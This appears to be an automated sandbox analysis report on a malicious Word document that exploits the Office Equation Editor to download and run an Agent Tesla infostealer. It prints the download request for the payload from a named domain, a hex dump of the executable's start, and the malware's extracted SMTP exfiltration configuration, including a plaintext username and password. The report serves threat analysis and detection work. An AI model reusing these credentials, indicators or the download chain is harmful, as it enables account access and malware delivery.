Windows Analysis Report Specification.doc

AV Detection:

Found malware configuration

Source: 11.2.newapp.exe.400000.0.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "yashanka.patabandige@dlmahtea.co", "Password": "FocusYourSEF@123", "Host": "mail.privateemail.com"}

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: sauberprint.com

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 143.95.246.178:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 143.95.246.178:80

Networking:

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: ASMALLORANGE1US ASMALLORANGE1US

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 198.54.122.60 198.54.122.60

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0Date: Thu, 14 Oct 2021 08:26:25 GMTContent-Type: application/x-msdownloadContent-Length: 620544Connection: keep-aliveLast-Modified: Wed, 13 Oct 2021 22:24:09 GMTAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 db 59 67 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 60 06 00 00 16 03 00 00 00 00 00 fa 7f 06 00 00 20 00 00 00 80 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 09 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a8 7f 06 00 4f 00 00 00 00 80 06 00 d4 13 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 60 06 00 00 20 00 00 00 60 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d4 13 03 00 00 80 06 00 00 14 03 00 00 62 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 09 00 00 02 00 00 00 76 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc 7f 06 00 00 00 00 00 48 00 00 00 02 00 05 00 9c 6e 00 00 0c 60 00 00 03 00 00 00 85 00 00 06 a8 ce 00 00 00 b1 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 02 28 1a 00 00 0a 00 00 2a 00 00 13 30 04 00 6d 00 00 00 01 00 00 11 00 1f 20 0a 06 8d 4c 00 00 01 0b 16 0c 2b 4a 00 02 6c 23 00 00 00 00 00 00 00 40 06 17 59 08 59 6c 28 1b 00 00 0a fe 05 16 fe 01 0d 09 2c 21 00 07 08 17 9e 02 23 00 00 00 00 00 00 00 40 06 17 59 08 59 6c 28 1b 00 00 0a 69 59 10 00 00 2b 04 07 08 16 9e 00 08 17 58 0c 08 07 8e 69 fe 04 13 04 11 04 2d aa 07 13 05 2b 00 11 05 2a 00 00 00 13 30 04 00 43 00 00 00 02 00 00 11 00 16 0a 16 0b 2b 2a 00 02 07 94 17 fe 01 0c 08 2c 1a 06 23 00 00 00 00 00 00 00 40 02 8e 69 07 59 17 59 6c 28 1b 00 00 0a 69 58 0a 00 07 17 58 0b 07 02 8e 69 fe 04 0d 09 2d cc 06 13 04 2b 00 11 04 2a 00 13 30 03 00 34 00 00 00 03 00 00 11 00 18 8d 4e 00 00 01 0b 07 16 72 01 00 00 70 a2 07 17 72 5b 00 00 70 a2 02 16 fe 01 0c 08 2c 08 00 07 16 9a 0a 00 2b 06 00 07 17 9a 0a 00 06 0d 2b 00 09 2a 13 30 03 00 40 00 00 00 04 00 00 11 00 16 0b 28 06 00 00 06 00 00 28 07 00 00 06 00 72 6d 00 00 70 28 1c 00 00 0a 00 28 1d 00 00 0a 0a 06 72 e

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /lupin/booobb.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sauberprint.comConnection: Keep-Alive

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 198.54.122.60:587

Uses SMTP (mail sending)

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 198.54.122.60:587

Found strings which match to known social media urls

Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

URLs found in memory or binary data

Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.664596383.0000000002431000.00000004.00000001.sdmp, newapp.exe, 0000000B.00000002.506916531.0000000002261000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: newapp.exe, 0000000B.00000002.506916531.0000000002261000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: newapp.exe, 0000000B.00000002.506916531.0000000002261000.00000004.00000001.sdmp	String found in binary or memory: http://Nbucou.com
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmp	String found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515898451.00000000060F0000.00000004.00000001.sdmp	String found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515994593.0000000006113000.00000004.00000001.sdmp	String found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der1
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515994593.0000000006113000.00000004.00000001.sdmp	String found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der11
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmp	String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.645559784.00000000060F0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.644743340.0000000008850000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516069331.000000000884C000.00000004.00000001.sdmp	String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp	String found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515965439.0000000008848000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.505169057.00000000060EF000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.co
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.665038465.00000000024F0000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.645695967.00000000005A5000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmp, edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.505245755.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabgB
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.665455883.0000000002588000.00000004.00000001.sdmp	String found in binary or memory: http://mail.privateemail.com
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.645559784.00000000060F0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515965439.0000000008848000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.pki.gva.es0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.665038465.00000000024F0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmp	String found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmp	String found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516069331.000000000884C000.00000004.00000001.sdmp	String found in binary or memory: http://repository.swisssign.com/0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000004.00000002.415369499.00000000056D0000.00000002.00020000.sdmp, edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.667587531.0000000005B10000.00000002.00020000.sdmp, newapp.exe, 00000008.00000002.484210437.00000000057B0000.00000002.00020000.sdmp, newapp.exe, 0000000B.00000002.507578016.0000000005BC0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000004.00000002.413432114.0000000002431000.00000004.00000001.sdmp, newapp.exe, 00000008.00000002.483448349.0000000002476000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.671412974.0000000007FE0000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.620886421.00000000060B4000.00000004.00000001.sdmp	String found in binary or memory: http://users.ocsp.d-trustS
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000004.00000002.415369499.00000000056D0000.00000002.00020000.sdmp, edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.667587531.0000000005B10000.00000002.00020000.sdmp, newapp.exe, 00000008.00000002.484210437.00000000057B0000.00000002.00020000.sdmp, newapp.exe, 0000000B.00000002.507578016.0000000005BC0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmp	String found in binary or memory: http://www.a-cert.at/certificate-policy.html0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmp	String found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmp	String found in binary or memory: http://www.a-cert.at0E
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp	String found in binary or memory: http://www.acabogacia.org/doc0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp	String found in binary or memory: http://www.acabogacia.org0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp	String found in binary or memory: http://www.ancert.com/cps0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516031777.00000000060BD000.00000004.00000001.sdmp	String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516031777.00000000060BD000.00000004.00000001.sdmp	String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmp	String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp	String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmp	String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp	String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp	String found in binary or memory: http://www.certifikat.dk/repository0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp, edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmp	String found in binary or memory: http://www.chambersign.org1
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000004.00000002.413103348.0000000000B80000.00000004.00020000.sdmp, newapp.exe, 00000008.00000002.483272364.00000000022C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp	String found in binary or memory: http://www.comsign.co.il/cps0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmp	String found in binary or memory: http://www.crc.bg0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.668190347.0000000006030000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515994593.0000000006113000.00000004.00000001.sdmp	String found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmp	String found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmp	String found in binary or memory: http://www.disig.sk/ca0f
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516031777.00000000060BD000.00000004.00000001.sdmp	String found in binary or memory: http://www.dnie.es/dpc0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-me.lv/repository0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-szigno.hu/RootCA.crl
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-szigno.hu/SZSZ/0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmp	String found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516126248.00000000060DD000.00000004.00000001.sdmp	String found in binary or memory: http://www.entrust.net/CRL/net1.crl0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.620886421.00000000060B4000.00000004.00000001.sdmp	String found in binary or memory: http://www.firmaprofesional.com0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.620792567.000000000881D000.00000004.00000001.sdmp	String found in binary or memory: http://www.globaltrust.info0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515965439.0000000008848000.00000004.00000001.sdmp	String found in binary or memory: http://www.globaltrust.info0=
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516081669.0000000008844000.00000004.00000001.sdmp	String found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515921788.00000000060CE000.00000004.00000001.sdmp	String found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515965439.0000000008848000.00000004.00000001.sdmp	String found in binary or memory: http://www.pki.gva.es/cps0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515965439.0000000008848000.00000004.00000001.sdmp	String found in binary or memory: http://www.pki.gva.es/cps0%
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515898451.00000000060F0000.00000004.00000001.sdmp	String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516081669.0000000008844000.00000004.00000001.sdmp	String found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516108866.000000000885C000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516108866.000000000885C000.00000004.00000001.sdmp	String found in binary or memory: http://www.registradores.org/scr/normativa/cp_f2.htm0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516031777.00000000060BD000.00000004.00000001.sdmp	String found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmp	String found in binary or memory: http://www.signatur.rtr.at/current.crl0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmp	String found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmp	String found in binary or memory: http://www.sk.ee/cps/0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmp	String found in binary or memory: http://www.sk.ee/juur/crl/0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515965439.0000000008848000.00000004.00000001.sdmp	String found in binary or memory: http://www.ssc.lt/cps03
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516069331.000000000884C000.00000004.00000001.sdmp	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515981287.0000000008852000.00000004.00000001.sdmp	String found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515898451.00000000060F0000.00000004.00000001.sdmp	String found in binary or memory: http://www.valicert.com/1
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.666161805.000000000280A000.00000004.00000001.sdmp, edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.666273710.0000000002869000.00000004.00000001.sdmp	String found in binary or memory: https://OT3VeV4yt7mB0FaAlTS.org
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515898451.00000000060F0000.00000004.00000001.sdmp	String found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515994593.0000000006113000.00000004.00000001.sdmp	String found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.516108866.000000000885C000.00000004.00000001.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000003.515808127.00000000060B4000.00000004.00000001.sdmp	String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: edufyrigefy4utwgqeoriufj4ce.exe, 00000007.00000002.665038465.00000000024F0000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
